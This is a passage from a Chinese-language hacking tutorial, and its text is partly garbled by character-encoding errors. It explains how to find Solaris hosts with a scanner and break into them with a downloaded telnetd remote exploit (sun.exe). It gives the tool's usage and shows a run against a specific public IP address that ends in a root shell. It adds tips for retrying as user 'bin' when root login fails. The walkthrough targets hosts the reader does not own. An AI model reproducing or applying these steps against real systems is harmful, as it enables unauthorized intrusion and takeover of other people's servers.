等掃描結(jié)束以后,我們?cè)倏纯匆郧按蜷_(kāi)的天眼,怎么樣?找到了很多的Solaris主機(jī)了吧!(如果沒(méi)有發(fā)現(xiàn)Solaris主機(jī),那么在SCANNER.EXE另外換一個(gè)IP段試一試,應(yīng)該能找到一些的). 
  
    好了,主機(jī)已經(jīng)找到了,接下來(lái)就是利用這個(gè)漏洞入侵了 ,將下載的sunos-telnet.zip解壓后發(fā)現(xiàn)有兩個(gè)文件,sun.exe和CYGWIN1.DLL,由于sun.exe需要CYGWIN1.DLL動(dòng)態(tài)數(shù)據(jù)庫(kù)的支持,所以在使用的時(shí)候請(qǐng)把兩者放在同一目錄下. 
  
    還是讓我們來(lái)看看sun.exe的用法,開(kāi)一個(gè)CMD,進(jìn)入改文件的目錄,在CMD下輸入:
  
  F:HACK>sun.exe
  
  ======================
  
  Solaris 5.6 7 8 telnetd Remote exploit
  
  Code by lion, Welcome to HUC website http://www.cnhonker.com
  
  usage: sun [-u user] [-p port] <-h host>
  
  -u: login username (default: bin), try “root”
  
  -p: port to use (default: 23)
  
  看懂了吧!假設(shè)我們找到一個(gè)IP為202.193.*.80的Solaris主機(jī),那么我們就輸入”
  
  sun.exe ?Cu root ?Cp 23 ?Ch 202.193.*.80
  
  我們也可以直接的輸入:
  
  sun.exe ?Ch 202.193.*.80
  
  這時(shí)就使用默認(rèn)的值,用戶名為bin,端口為23.
  
  現(xiàn)在我們就拿一臺(tái)我們剛剛找到的Solaris主機(jī)來(lái)做測(cè)試了,由于攻擊的端口就是23,所以這個(gè)-p我們就不要輸入了,在CMD下輸入:
  
  Microsoft Windows XP [版本 5.1.2600]
  
  (C) 版權(quán)所有 1985-2001 Microsoft Corp. D:Documents and Settingslinyun>f:
  
  F:>cd hack
  
  F:HACK>sun.exe -u root -h 210.220.131.236
  
  ==========================
  
  Solaris 5.6 7 8 telnetd Remote exploite
  
  Code by lion.Welcome to HUC website http://www.cnhonker.com
  
  send to target:
  
  root c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
  
  c c c c c c c c c c c c c c c c c c c c c c c c c c 
  
    當(dāng)出現(xiàn)了#這個(gè)符號(hào)的時(shí)候,這就說(shuō)明了我們已經(jīng)取得了管理員的權(quán)限了。 
  
    我們可以看看自己是不是真的取得管理員的權(quán)限了,在CMD中輸入who am i就可以看見(jiàn)我們的IP地址了! 
  
    注意:如果在攻擊的時(shí)候出現(xiàn)connect: Connection refused;connect: Connection aborted; connect: Connection reset by peer這樣的信息,或者等了很久還沒(méi)有反應(yīng),則表示攻擊失敗了,最大的可能是這臺(tái)Slaris不允許root用戶遠(yuǎn)程登陸,我們可以用一般的系統(tǒng)用戶bin溢出試一試.
  
  

分享到

多易

相關(guān)推薦